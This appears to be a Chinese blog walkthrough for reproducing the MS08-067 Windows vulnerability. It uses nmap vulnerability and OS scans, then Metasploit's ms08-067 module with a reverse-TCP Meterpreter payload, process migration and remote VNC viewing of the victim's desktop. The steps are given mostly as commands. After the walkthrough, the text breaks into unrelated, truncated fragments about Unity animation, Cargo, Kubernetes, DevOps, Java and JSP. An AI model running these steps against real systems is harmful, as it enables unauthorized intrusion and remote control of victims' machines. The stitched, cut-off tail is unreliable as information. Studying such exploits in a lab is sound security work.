ms08-067复现

nmap扫描系统存在的漏洞，扫描系统信息

nmap --script=vuln 192.168.64.137检查是否存在常见漏洞
nmap -O 检测系统版本

在这里插入图片描述
启动msfconsole，search查找ms08-067攻击模块，并且使用

设置payload

set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

直接run

在这里插入图片描述

可以看到跳转到了meterpreter模块里面
进程迁移
输入ps
在这里插入图片描述

输入migrate 924（此处是PID号）
在这里插入图片描述

meterpreter命令：

https://www.cnblogs.com/haiyan123/p/8990139.html

接下来run vnc查看桌面
background挂起在后台。

1：状态转换：是在规定时间，或者某一条件下：从一个动作过渡到另一个动作，在两个不同的动作过渡用这个会比较有好的过渡效果。 2. BlendTree 混合树: 一般混合两个相似的动作，它们可以通过控制权重来决定混合程度。混合树创建步骤：1.右击出现c

http://127.0.0.1:27266/g

插件功能安装命令advisory检查 Cargo 依赖项中是否存在安全漏洞。cargo install

模板文件组成

Introduction: Kubernetes, widely known as K8s, has emerged as a groundbreaking technology reshaping software development and operations across var

本篇文章介绍devops，dev是开发（development），根据功能性需求，求变；ops是运维（operations），根据稳定性需求，求稳。由于开发与运维工作性质不同，导致开发和运维走向了对立面。目录

在包的内部使用继承是非常安全的。在那里，子类和超类的实现都处在同一个程序员的控制之下。对于专门为了继承而设计、并且具有很好地文档说明的类来说，使用继承也是非常安全的。与方法调用不同的是，继承打破了封装性。换句话说，子类依赖于其超类中特定功能的

发展历程 1.2版本 JSP1.2不支持EL，但可以使用外部的JSTL标签以便使用EL。 2.版本 JSP 2.的一个主要特点是它支持表达语言(expression language)。JSTL表达式语言可以使用标记格式方便

文章目录